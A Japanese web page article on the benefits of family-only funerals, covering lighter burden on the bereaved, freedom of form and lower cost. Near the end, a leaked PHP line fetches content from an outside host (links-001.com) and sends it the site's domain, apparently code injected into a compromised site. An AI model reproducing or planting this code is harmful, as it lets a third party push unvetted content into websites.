前へ
次へ

家族葬をすることのメリットとは

身内がお亡くなりになるというのは、悲しいことです。
また、故人を弔うために葬儀を行うことも大切ですが、通常の葬儀となると遺族側はいろいろと対応に追われてしまい、ゆっくりと故人との別れをするということも難しい傾向があるのも事実です。
この点から、家族葬をすることにより遺族の思いなどを反映するというのがメリットの一つともいえます。
通常の葬儀ならば、故人に関係する身内や親しい友人だけでなく知人や仕事関係でお世話になった方などさまざまな方が集まり葬儀を行うことになります。
ですが、遺族側は葬儀のためにいろいろと動く必要があり、集まっていただいた方達に対してもきちんとした対応をする必要性がでてきます。
結果として、遺族側が故人との別れの時間というものが削られてしまう可能性もでてくるでしょう。
家族葬では、遺族、故人との関係で親しい間柄の方などだけで行うことになるため、遺族側の負担もかなり減ることになります。
結果として遺族も故人に対して、しっかりと向き合い別れをすることができる点は大きなメリットといえるでしょう。
葬儀の内容に関しても、比較的自由であるという点もメリットといえます。
故人の遺言に合わせて葬儀を行う、遺族側からの希望する葬儀をするなど身内や親しい友人など親しい方達だけで行うことになるため、その分、葬儀としても自由度は高い点はメリットです。
その他にも、葬儀に関しては、金銭的な面から考えても負担が比較的少ないという点はメリットの一つといえるでしょう。
葬儀に関して、人それぞれ考え方の違いなどもありますが近年では、葬儀の規模なども縮小気味であり、多くの方を呼ばないケースも増えています。
家族や親しい間柄だけで葬儀を行うことは、地味なイメージもありますが、葬儀の準備による負担なども考慮し、故人との別れの時間などがしっかりと確保できる点からも家族葬は一つの葬儀の形として受け入れられていくといえます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top